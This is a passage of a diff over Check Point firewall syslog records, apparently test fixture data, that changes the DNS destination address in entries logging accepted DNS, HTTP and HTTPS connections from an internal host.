service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x9,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35669"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47595"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x9,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35669"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"13.224.226.19"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"57814"; service:"80"; service_id:"http"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"47138"; service:"80"; service_id:"http"; src:"192.168.2.2"] 
-<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x3,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33386"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x3,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33386"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x4,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"13.224.227.114"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50732"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x5,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"13.224.227.114"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50734"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0xa,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45919"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x4,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"22"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57125"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0xa,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45919"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x4,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"22"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57125"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x5,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"23"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"151.101.37.108"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37516"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x6,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"24"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"151.101.37.108"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37518"; service:"443"; service_id:"https"; 
src:"192.168.2.2"] <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x7,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"25"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"151.101.37.108"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37520"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x6,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"13.224.226.19"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"57828"; service:"80"; service_id:"http"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54730"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54730"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.108.173.172"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34032"; service:"443"; service_id:"https"; 
src:"192.168.2.2"] <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"185.33.223.209"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46472"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54587"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54587"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"52.50.107.92"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35246"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36804"; service:"53"; service_id:"domain-udp"; 
src:"192.168.2.2"] +<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36804"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"185.33.223.206"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41264"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.130"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34362"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46991"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46991"; service:"53"; 
